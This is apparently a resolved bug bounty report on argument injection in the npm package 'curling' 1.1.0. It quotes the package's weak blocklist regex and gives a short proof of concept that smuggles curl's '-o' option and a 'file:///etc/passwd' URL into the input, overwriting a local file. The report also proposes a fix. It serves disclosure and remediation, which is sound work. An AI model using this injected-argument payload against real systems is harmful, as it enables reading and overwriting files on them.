[curling] Remote Code Execution
Critical
Vulnerability Details
I would like to report `RCE` in `curling`
I can bypass the security check for special characters and read or overwrite files
# Module
**module name:** curling
**version:** 1.1.0
**npm page:** `https://www.npmjs.com/package/curling`
## Module Description
A node wrapper for curl with a very simple api.
## Module Stats
156 weekly downloads
# Vulnerability
## Vulnerability Description
The only input validation is a blocklist regular expression that rejects a handful of shell metacharacters. It does not reject `-` or whitespace, so a caller-controlled string can still carry curl command-line options (for example `-o` to choose an output file), and it does not restrict the URL scheme, so `file://` URLs reach curl as well:
```javascript
// The only check curling applies before handing `command` to curl: a blocklist
// of a few shell metacharacters. `-`, spaces and `file://` are not in it, so
// curl options smuggled into the string pass straight through.
/[`$&{}[;|]/g.test(command)
```
## Steps To Reproduce:
- Run `npm i curling`
- Create and run the following POC index.js:
```javascript
const curling = require('curling');
// The string contains none of the blocklisted characters, so it passes the check;
// curl then treats `-o ./index.js` as an option and writes /etc/passwd over index.js.
curling.run('file:///etc/passwd -o ./index.js', function (d, payload) { console.log(payload); });
```
- The exploit works: `index.js` is overwritten with the contents of `/etc/passwd`
(attachment F973903)
## Patch
A blocklist regular expression is the wrong tool here, and adding more characters to it will not close the hole: the payload above uses no special characters at all. The wrapper should stop building a shell string from caller input. Pass the URL to curl as its own argv element (for example with `child_process.execFile`, which does not invoke a shell), place it after `--` so curl never parses it as an option, and validate it as a URL with an allowed scheme rather than scanning it for characters.
# Wrap up
- I contacted the maintainer to let them know: [N]
- I opened an issue in the related repository: [N]
## Impact
Argument injection into the curl command line built by `curling`: a caller-supplied URL can carry curl options such as `-o`, allowing arbitrary file overwrite, and `file://` URLs allow local files to be read.
Report Stats
- Report ID: 973386
- State: Closed
- Substate: resolved
- Upvotes: 1